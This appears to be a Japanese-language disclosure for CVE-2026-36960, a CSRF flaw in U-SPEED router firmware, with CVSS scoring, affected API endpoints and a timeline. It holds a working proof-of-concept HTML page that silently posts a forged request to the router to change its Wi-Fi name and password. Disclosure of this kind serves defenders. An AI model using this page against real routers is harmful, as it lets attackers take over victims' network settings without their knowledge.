
CVE-2026-36960の概念実証エクスプロイト。U-SPEEDルーターのファームウェアにおけるCSRF脆弱性であり、偽造リクエストを介した不正な設定変更を可能にします。
CVE ID: CVE-2026-36960 日付: 2026-04-29 発見者: Kirubel Solomne ベンダー: U-SPEED 製品: U-SPEED Router ファームウェアバージョン: V1.0.0 CWE: CWE-352 - クロスサイトリクエストフォージェリ(CSRF)
U-SPEED Router ファームウェア V1.0.0 は、管理APIエンドポイントに対して、CSRFトークンや厳格なOrigin/Referer検証などのCSRF対策メカニズムを実装していません。攻撃者は、設定エンドポイントに偽造されたHTTPリクエストを送信する悪意のあるWebページを作成できます。認証済みの管理者がその悪意のあるWebページを訪問すると、ルーターはそのリクエストを正当な管理操作として処理します。
CVSS v3.1 スコア: 8.8(高)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| メトリック | 値 |
|---|---|
| 攻撃元区分 | ネットワーク |
| 攻撃条件の複雑さ | 低 |
| 必要な特権レベル | なし |
| ユーザー操作 | 要 |
| 機密性への影響 | 高 |
| 完全性への影響 | 高 |
| 可用性への影響 | 高 |
| エンドポイント | 機能 |
|---|---|
/api/setWlan | ワイヤレスネットワーク設定 |
/api/telnet | Telnetサービス設定 |
| その他の設定エンドポイント | 各種管理機能 |
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
期待される動作: CSRFトークンが存在しないため、リクエストは拒否されるべきです。 実際の動作: ルーターは偽造されたリクエストを受け入れ、処理します。
| 日付 | イベント |
|---|---|
| 2026-04-29 | 脆弱性を発見 |
| 2026-04-29 | MITREに報告 |
| 2026-04-29 | CVE-2026-36960 採番 |
| 2026-04-29 | 公開開示 |